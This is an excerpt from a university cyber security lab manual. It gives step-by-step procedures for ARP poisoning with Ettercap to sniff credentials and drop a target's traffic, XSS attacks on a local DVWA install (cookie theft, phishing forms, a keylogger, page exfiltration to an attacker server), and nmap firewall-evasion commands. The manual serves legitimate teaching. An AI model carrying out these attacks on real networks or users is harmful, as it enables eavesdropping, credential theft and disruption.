Information on Digital Currency such as Bitcoin, Ethereum and Monero can be found within OSINT
Framework.

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 5-8


UG Program in Electronics and Computer Science

Figure 5.7 Digital Currency

5.7 Simulated output:

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 5-9


UG Program in Electronics and Computer Science

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 5-10


UG Program in Electronics and Computer Science

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 5-11


UG Program in Electronics and Computer Science

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 5-12


UG Program in Electronics and Computer Science
5.8 Conclusion:

……………………………………………………………………………………………
……………………………………………………………………………………………
……………………………………………………………………………………………
……………………………………………………………………………………………

5.9 Questions:

1. Open-source intelligence (OSINT) involves gathering publicly accessible data from sources like:
____________________________________________________________________________________
____________________________________________________________________________________
2. The best OSINT tools include:
____________________________________________________________________________________
____________________________________________________________________________________
3. The OSINT framework can be used for:
____________________________________________________________________________________
____________________________________________________________________________________

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 5-13


UG Program in Electronics and Computer Science

Experiment No. – 6

Date of Performance:

Date of Submission:

Program Execution/
formation/ Timely
Viva Experiment
correction/ Submission Sign with Date
(03) Total (10)
ethical practices (01)
(06)

Experiment No. 6
ARP poisoning Attack in Ettercap

6.1 Aim: To gather basic information about the ARP poisoning Attack in Ettercap.

6.2 Course Outcome: Identify cyber-attacks and its countermeasures.

6.3 Learning Objectives: Study of Ettercap framework in Kali Linux.

6.4 Requirement: Any type of web browser and Kali Linux

6.5 Related Theory:

ARP spoofing is an attack against an Ethernet or Wi-Fi network to get between the router and
the target user. In an ARP-spoofing attack, messages meant for the target are sent to the attacker
instead, allowing the attacker to spy on, deny service to, or man-in-the-middle a target. One of
the most popular tools for performing this attack is Ettercap, which comes preinstalled on Kali
Linux.
On a regular network, messages are routed over Ethernet or Wi-Fi by associating the
MAC address of a connected device with the IP address used to identify it by the router. Usually,
this happens via an address resolution protocol (ARP) message indicating which device's MAC

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 6-1


UG Program in Electronics and Computer Science
address goes with which IP address. It lets the rest of the network know where to send traffic —
but it can be easily spoofed to change the way traffic is routed.

In an ARP-spoofing attack, a program like Ettercap will send spoofed messages attempting to get
nearby devices to associate the hacker's MAC address with the IP address of the target. When
successful, they're stored temporarily in a configuration setting on other network devices. If the
rest of the network starts delivering packets intended for the target to the attacker instead, the
attacker effectively controls the target's data connection.

Types of ARP Spoofing Attacks:


There can be three primary outcomes after an attacker gains initial success in poisoning
the ARP cache of other hosts on the network:

● The attacker can spy on traffic. They can lurk in the shadows, seeing everything that
the target user does on the network.
● The attacker can intercept and modify the packets in a man-in-the-middle attack.
They can intercept passwords typed into an HTTP website, see DNS requests, and
resolve IP addresses the target is navigating to in order to see what sites the target is
visiting. In a man-in-the-middle attack, the attacker has the opportunity not only to see
what's happening on the network but manipulate it as well. For instance, they can
attempt to downgrade the encryption the connection is using by deliberately requesting
insecure versions of webpages to make the attacker's job of sniffing passwords easier.
Also, a hacker can simply be a nuisance. For example, they can replace words in the
text of a website, flip or replace images, or modify other types of data flowing to and
from the target.
● The attacker can drop the packets meant for the target to create a denial-of-service
attack. This is possibly the most frustrating to a target. While a Wi-Fi authentication
attack is by far the more common cause of a Wi-Fi network being attacked, ARP
spoofing can be much more challenging to figure out. If the attacker chooses not to
forward on the packets now being sent to it instead of the target, the target will never
receive them. The Wi-Fi network can be jammed from the inside, getting between the
target and the router and then dropping the packets flowing between.
Ettercap Graphical
● One of the most intriguing programs installed by default in Kali Linux is Ettercap.
● Unlike many of the programs that are command-line only, Ettercap features a
graphical interface that's very beginner-friendly. While the results may sometimes
vary, Ettercap is an excellent tool for newbies to get the hang of network attacks like
ARP spoofing.

6.6 Procedure:

● If you don't already have Ettercap (like if you download a Light version of Kali) you
can get it by typing the following into a terminal window.

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 6-2


UG Program in Electronics and Computer Science

Figure 6.1 Installing Ettercap

Ettercap isn't the only tool for this, nor is it the most modern. Other tools, such as Bettercap, claim to
do what Ettercap does but more effectively. However, Ettercap proves useful enough to feature for
our demonstration. The general workflow of an Ettercap ARP spoofing attack is to join a network
you want to attack, locate hosts on the network, assign targets to a "targets" file, and then execute the
attack on the targets. Once we do all of that, we can figuratively watch over the target's shoulder as
they browse the internet, and we can even kill the connection from websites we want to steer them
away from. We can also run various payloads, like isolating a host from the rest of the network,
denying them service by dropping all packets sent to them, or running scripts to attempt to
downgrade the security of the connection.

Step1 -Connect to the Network


The first step of ARP spoofing is to connect to the network you want to attack. If you're
attacking an encrypted WEP, WPA, or WPA2 network, you'll need to know the password. This is
because we're attacking the network internally, so we need to be able to see some information about
the other hosts on the network and the data passing within it.
You can connect to a network for ARP spoofing in two ways. The first is to connect via Ethernet,
which is very effective but may not always be practical and is rarely subtle. Instead, many people
prefer to use a wireless network adapter and perform ARP spoofing over Wi-Fi.

Step 2 -Start Ettercap


In Kali, click on "Applications," then "Sniffing & Spoofing," followed by
"ettercap-graphical." Alternatively, click on the "Show Applications" option in the dock, then
search for and select "Ettercap."

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 6-3


UG Program in Electronics and Computer Science

Figure 6.2 Installing Ettercap

Once it starts up, you should find yourself on the Ettercap main screen. You'll see the
spooky Ettercap logo, and a few drop-down menus to start the attack from. In the next step, we'll
start exploring the "Sniff" menu.

Figure 6.3 Using Ettercap

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 6-4


UG Program in Electronics and Computer Science
At this point, make sure you have an active connection to the network before you continue.

Step 3-Select Network Interface to Sniff On


Click on the "Sniff" menu item, and then select "Unified sniffing." A new window will
open asking you to select which network interface you want to sniff on. You should select the
network interface that is currently connected to the network you're attacking.

Figure 6.4 Using Ettercap

Now, you'll see some text confirming that sniffing has started, and you'll be able to access more
advanced menu options such as Targets, Hosts, Mitm, Plugins, etc. Before we get started using any
of them, we'll need to identify our target on the network.

Figure 6.5 Identify targets

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 6-5


UG Program in Electronics and Computer Science
Step 4-Identify Hosts on a Network

To find the device we want to attack on the network, Ettercap has a few tricks up
its sleeve.
First, we can do a simple scan for hosts by clicking "Hosts," then "Scan for hosts."
A scan will execute, and after it finishes, you can see the resulting hosts Ettercap has
identified on the network by clicking "Hosts," then "Hosts list."

Figure 6.6 Identify Hosts on a Network

We can now see a list of targets we've discovered on the network. Want to see what they're doing
or narrow down the targets? Click on "View," then "Connections" to start snooping on connections.
Once in the Connections view, you can filter the connections by IP address, type of connection,
and whether the connection is open, closed, active, or killed. This gives you a lot of snooping
power, which can be augmented by clicking the "View," then "Resolve IP addresses."

This means Ettercap will try to resolve the IP addresses it sees other devices on the network
connecting to. If you want to identify a target on a network and know what they're browsing, look
over their shoulder at what website they're on, and match the website to an IP address with an
active connection to the same website. Otherwise, you can usually tell by the MAC address, as you
can look it up online to see the manufacturer.

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 6-6


UG Program in Electronics and Computer Science

Figure 6.7 Identify Hosts on a Network

Step 5 -Select Hosts to Target with ARP Spoofing


Now that we've identified our target's IP address, it's time to add them to a target list.
Once we do this, we'll be telling Ettercap that we want to designate that IP address as one we want
to pretend to be, so that we're receiving messages from the router that were meant to be sent to the
target.
Go back to the "Hosts" screen, and select the IP address of the target you want to target.
Click the IP address to highlight it, and then click on "Targets," followed by "Target list," to see a
list of devices that have been targeted for ARP spoofing.

Figure 6.8 Select Hosts to Target with ARP Spoofing

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 6-7


UG Program in Electronics and Computer Science

Now, we can go to the "Mitm" menu to start our attack on this target.
Step 6-Launch Attack on Targets
Click on the "Mitm" menu, and select "ARP poisoning." A popup will open, and you'll
select "Sniff remote connections" to begin the sniffing attack.

Figure 6.9 Launch Attack on Targets

Once this attack has begun, you'll be able to intercept login credentials if the user you're targeting
enters them into a website that doesn't use HTTPS. This could be a router or a device on the
network or even a website that uses poor security.

To try another attack, you can click on "Plugins," then "Load plugins," to show the plugin menu.
If you select the DOS attack, it will begin dropping the packets sent to this target, cutting off their
internet access.

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 6-8


UG Program in Electronics and Computer Science

Figure 6.10 Launch Attack on Targets

Step 7-Try Intercepting a Password


Now, let's actually try intercepting a password. A website that's great for testing is aavtain.com,
which deliberately uses bad security so that you can intercept credentials. On the target device,
navigate to aavtrain.com. Once it loads, you'll see a login screen you can enter a fake login and
password into.

Figure 6.11 Intercepting a Password

Enter a username and password, and then hit "Submit." If Ettercap is successful, you should see the
login and password you typed appear on the attacker's screen

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 6-9


UG Program in Electronics and Computer Science

Figure 6.12 Intercepting a Password

In this result above, we can see that Ettercap successfully ARP poisoned the target and intercepted
an HTTP login request the target was sending to an insecure website.

ARP Poisoning Is a Powerful Tool with Some Limitations


The major obvious limitation of ARP spoofing is that it only works if you're connected to a Wi-Fi
network. This means it works on open networks but may not work well against networks that have
more sophisticated monitoring or firewalls that may detect this sort of behaviour.
ARP spoofing attacks are another example of why it's so essential to pick strong passwords for your
networks and limit access to those you trust. You're giving away a lot of trust when you give
someone your network password or an Ethernet connection, so remember to pick your passwords
carefully and who you share them with.

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 6-10


UG Program in Electronics and Computer Science
6.7 Simulated output:

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 6-11


UG Program in Electronics and Computer Science

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 6-12


UG Program in Electronics and Computer Science

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 6-13


UG Program in Electronics and Computer Science

6.8 Conclusion:

…………………………………………………………………………………………………………
…………………………………………………………………………………………………………
…………………………………………………………………………………………………………
…………………………………………………………………………………………………………

6.9 Questions:

1. In an ARP-spoofing attack, a program like Ettercap will send spoofed messages attempting to
get nearby devices to associate the hacker's ___________address with the _________address of the
target.
2. The major obvious limitation of ARP spoofing is
_________________________________________________________________________________
3. ___________________________ is a technique where the attacker sends Malicious ARP
Packets to the default gateway and to the host who is communicating with the default gateway in the
local area network.

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 6-14


UG Program in Electronics and Computer Science

Experiment No. – 7

Date of Performance:

Date of Submission:

Program Execution/
formation/ Timely
Viva Experiment
correction/ Submission Sign with Date
(03) Total (10)
ethical practices (01)
(06)

Experiment No. 7
Cross-site scripting attack

7.1Aim: To demonstrate cross-site scripting attack.

7.2 Course Outcome: Identify cyber-attacks and its countermeasures.

7.3 Learning Objectives: Study of Cross-Site Scripting (XSS) vulnerability in web


applications.

7.4 Requirement: Any type of web browser and Kali Linux

7.5 Related Theory:

Cross-Site Scripting (XSS) is a vulnerability in web applications and also the name of a client-side
attack in which the attacker injects and runs a malicious script into a legitimate web page. Browsers
are capable of displaying HTML and executing JavaScript. If the application does not escape special
characters in the input/output and reflects user input as-is back to the browser, an adversary may be
able to launch a Cross-Site Scripting (XSS) attack successfully. You can find more information about
this vulnerability in OWASP’s Cross-Site Scripting page. For demo purposes, we will use the
well-known DVWA application, which we have installed locally.

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 7-1


UG Program in Electronics and Computer Science
The DVWA page http://localhost:81/DVWA/vulnerabilities/xss_r/ is affected by a reflected XSS in
the name parameter. This can be seen in the figure below when we inject the JavaScript code
<script>alert(123)</script> and it is reflected and executed in the response page.

Figure 7.1 DVWA page


7.6 Procedure:

XSS Attack 1: Hijacking the user’s session

Most web applications maintain user sessions in order to identify the user across multiple HTTP
requests. Sessions are identified by session cookies.
For example, after a successful login to an application, the server will send you a session cookie by
the Set-Cookie header. Now, if you want to access any page in the application or submit a form, the
cookie (which is now stored in the browser) will also be included in all the requests sent to the
server. This way, the server will know who you are.
Thus, session cookies are sensitive information which, if compromised, may allow an attacker to
impersonate the legitimate user and gain access to his existing web session. This attack is called
session hijacking.
JavaScript code running in the browser can access the session cookies (when they lack the flag
HTTPOnly) by calling document.cookie. So, if we inject the following payload into our name
parameter, the vulnerable page will show the current cookie value in an alert box:

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 7-2


UG Program in Electronics and Computer Science

Figure 7.2 DVWA page

Now, in order to steal the cookies, we have to provide a payload which will send the cookie value to
the attacker-controlled website.
The following payload creates a new Image object in the DOM of the current page and sets the src
attribute to the attacker’s website. As a result, the browser will make an HTTP request to this
external website (192.168.149.128) and the URL will contain the session cookie.

So here is the attack URL which will send the cookies to our server:

When the browser receives this request, it executes the JavaScript payload, which makes a new
request to 192.168.149.128, along with the cookie value in the URL, as shown below.

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 7-3


UG Program in Electronics and Computer Science

If we listen for an incoming connection on the attacker-controlled server (192.168.149.128), we can


see an incoming request with cookie values (security and PHPSESSID) appended in the URL. The
same information can be found in the access.log file on the server.

Figure 7.3 Incoming request with cookie values

Using the stolen cookie:


With the above cookie information, if we access any internal page of the application and append the
cookie value in the request, we can access the page on behalf of the victim, in its own session
(without knowing the username and password). Basically, we have hijacked the user’s session.

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 7-4


UG Program in Electronics and Computer Science

Figure 7.4 Incoming request with cookie values

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 7-5


UG Program in Electronics and Computer Science

Figure 7.4 XSS in DVWA


The HTTPOnly cookie attribute can help to mitigate this scenario by preventing access to the cookie
value through JavaScript. It can be set when initializing the cookie value (via Set-Cookie header).

XSS Attack 2: Perform unauthorized activities


If the HTTPOnly cookie attribute is set, we cannot steal the cookies through JavaScript. However,
using the XSS attack, we can still perform unauthorized actions inside the application on behalf of
the user.

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 7-6


UG Program in Electronics and Computer Science
For instance, in this attack scenario, we will post a new message in the Guestbook on behalf of the
victim user, without his consent. For this, we need to forge an HTTP POST request to the Guestbook
page with the appropriate parameters with JavaScript.
The following payload will do this by creating an XMLHTTPRequest object and setting the
necessary header and data:

This is how the request looks like in the browser and also intercepted in Burp.

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 7-7


UG Program in Electronics and Computer Science

Figure 7.5 XSS Attack 2

The script on execution will generate a new request to add a comment on behalf of the user.

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 7-8


UG Program in Electronics and Computer Science

Figure 7.6 XSS Attack 2

XSS Attack 3: Phishing to steal user credentials


XSS can also be used to inject a form into the vulnerable page and use this form to collect user
credentials. This type of attack is called phishing.
The payload below will inject a form with the message Please login to proceed, along with username
and password input fields.

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 7-9


UG Program in Electronics and Computer Science
When accessing the link below, the victim may enter its credentials in the injected form. Note that
we can modify the payload to make it look like a legitimate form as per our need.

Once the user enters their credentials and clicks on the Logon button, the request is sent to the
attacker-controlled server. The request can be seen in the screenshots below:

Figure 7.7 XSS Attack 3

The credentials entered by the user (pentest: pentest) can be seen on the receiving server.

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 7-10


UG Program in Electronics and Computer Science

XSS Attack 4: Capture the keystrokes by injecting a keylogger


In this attack scenario, we will inject a JavaScript keylogger into the vulnerable web page and we
will capture all the keystrokes of the user within the current page.
First of all, we will create a separate JavaScript file and we will host it on the attacker-controlled
server. We need this file because the payload is too big to be inserted in the URL and we avoid
encoding and escaping errors. The JavaScript file contains the following code:

On every keypress, a new XMLHttp request is generated and sent towards the keylog.php page
hosted at the attacker-controlled server. The code in keylog.php writes the value of the pressed keys
into a file called data.txt.

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 7-11


UG Program in Electronics and Computer Science

Now we need to call the vulnerable page with the payload from our server:

Figure 7.8 XSS Attack 4


Once the script is loaded on the page, a new request is fired with every stroke of any key.

The value of the parameter key is being written to the data.txt file, as shown in the screenshot below.

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 7-12


UG Program in Electronics and Computer Science

Figure 7.9 XSS Attack 4

XSS Attack 5: Stealing sensitive information


Another malicious activity that can be performed with an XSS attack is stealing sensitive
information from the user’s current session. Imagine that an internet banking application is
vulnerable to XSS, the attacker could read the current balance, transaction information, personal
data, etc.
For this scenario, we need to create a JavaScript file on the attacker-controlled server. The file
contains logic that takes a screenshot of the page where the script is running:

Then we need to create a PHP file on the attacker’s server, which saves the content of the png
parameter into the test.png file.

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 7-13


UG Program in Electronics and Computer Science

Now we inject the JavaScript code into the vulnerable page by tricking the user to access the
following URL:

Once the JavaScript file is loaded, the script sends the data in base64 format to the saveshot.php file
which writes the data into the test.png file. On opening the test.png file, we can see the screen
capture of the vulnerable page.

Figure 7.10 XSS Attack 5

Another way
Another way to steal the page content would be to get the HTML source code by using
getElementById. Here is a payload that gets the innerHTML of the guestbook_comments element
and sends it to the attacker.

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 7-14


UG Program in Electronics and Computer Science

Figure 7.11 XSS Attack 5

We can also fetch the entire page source of the page by using the following payload:

Figure 7.12 XSS Attack 5

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 7-15


UG Program in Electronics and Computer Science

Figure 7.13 XSS Attack 5

Decoding the received data in the Burp Decoder gives us the cleartext page source of the vulnerable
page. Here, we can see the Guestbook comments.

Figure 7.14 Burp suite

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 7-16


UG Program in Electronics and Computer Science

7.7 Simulated output:

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 7-17


UG Program in Electronics and Computer Science

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 7-18


UG Program in Electronics and Computer Science

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 7-19


UG Program in Electronics and Computer Science
7.8 Conclusion:

…………………………………………………………………………………………
…………………………………………………………………………………………
…………………………………………………………………………………………
…………………………………………………………………………………………

7.9 Questions:

1. ________________ vulnerability allows an attacker to compromise the interactions that users


have with a vulnerable application.
2. XSS works by exploiting a vulnerability in _____________, which results in it returning
malicious JavaScript code when users visit it.
3. Types of XSS attacks are:
______________________________________________________________________________
______________________________________________________________________________

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 7-20


UG Program in Electronics and Computer Science

Experiment No. – 8

Date of Performance:

Date of Submission:

Program Execution/
formation/ Timely
Viva Experiment
correction/ Submission Sign with Date
(03) Total (10)
ethical practices (01)
(06)

Experiment No. 8
IDS and firewalls

8.1Aim: Study the behaviour of protections such as IDS and firewalls when altering headers in
network packets.
8.2 Course Outcome: Identify various web application and Network vulnerability scanning
techniques and defence methodologies.
8.3 Learning Objectives: Study of IDS and firewall using Wireshark.

8.4 Requirement: Kali Linux

8.5 Related Theory:

1. By Fragmenting the packets with 8 bit data:


Fragment packets, optionally with given MTU. If the firewall, or the IDS/IPS, does not reassemble the
packet, it will most likely let it pass. Consequently, the target system will reassemble and process it.
Command: nmap -sS -Pn -f -F 10.10.179.150

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 8-1


UG Program in Electronics and Computer Science

Figure 8.1 Wireshark to capture packets


If you want to limit the IP data to 8 bytes, the 24 bytes of the TCP header will be divided across 3 IP
packets
2. Generate ip packets with specific length.
In some instances, you might find out that the size of the packets is triggering the firewall or the
IDS/IPS to detect and block you. If you ever find yourself in such a situation, you can make your port
scanning more evasive by setting a specific length. You can set the length of data carried within the IP
packet using --data-length VALUE. Again, remember that the length should be a multiple of 8.

If you run the following Nmap scan nmap -sS -Pn --data-length 64 -F 10.10.179.150, each TCP segment
will be padded with random data till its length is 64 bytes. In the screenshot below, we can see that each
TCP segment has a length of 64 bytes.
Command:

Figure 8.2 Wireshark to generate ip packets with specific length

By manipulating TTL value


Nmap gives you further control over the different fields in the IP header. One of the fields you can
control is the Time-to-Live (TTL). Nmap options include --ttl VALUE to set the TTL to a custom value.
This option might be useful if you think the default TTL exposes your port scan activities.

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 8-2


UG Program in Electronics and Computer Science
Command: nmap -sS -Pn --ttl 81 -F 10.10.179.150.

Figure 8.3 Manipulate TTL value

Send packets with bogus Tcp/Udp checksums.


Asks Nmap to use an invalid TCP, UDP or SCTP checksum for packets sent to target hosts. Since
virtually all host IP stacks properly drop these packets, any responses received are likely coming from a
firewall or IDS that didn't bother to verify the checksum

Command: nmap -sS -Pn --badsum -F 10.10.179.150

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 8-3


UG Program in Electronics and Computer Science

Figure 8.4 Send packets with bogus Tcp/Udp checksums

Results:
By Fragmenting the packets with 8 bit data:

By generating ip packets with specific length.

Figure 8.5 Results

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 8-4


UG Program in Electronics and Computer Science
By manipulating the TTL value.

By sending packets with bogus TCP/UDP checksums.

Figure 8.6 Results

8.6 Simulated output:

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 8-5


UG Program in Electronics and Computer Science

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 8-6


UG Program in Electronics and Computer Science

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 8-7


UG Program in Electronics and Computer Science

8.7 Conclusion:

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 8-8


UG Program in Electronics and Computer Science
……………………………………………………………………………………………………………
……………………………………………………………………………………………………………
……………………………………………………………………………………………………………
……………………………………………………………………………………………………………

8.8 Questions:

1. A ____________ controls access to a network by blocking or permitting traffic based on


security rules, while _____________ monitors and analyses network traffic for suspicious
activities to detect potential threats.
2. Types of IDS are:
_____________________________________________________________________________
_____________________________________________________________________________
3. Types of firewall are:
_____________________________________________________________________________
_____________________________________________________________________________

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 8-9

You might also like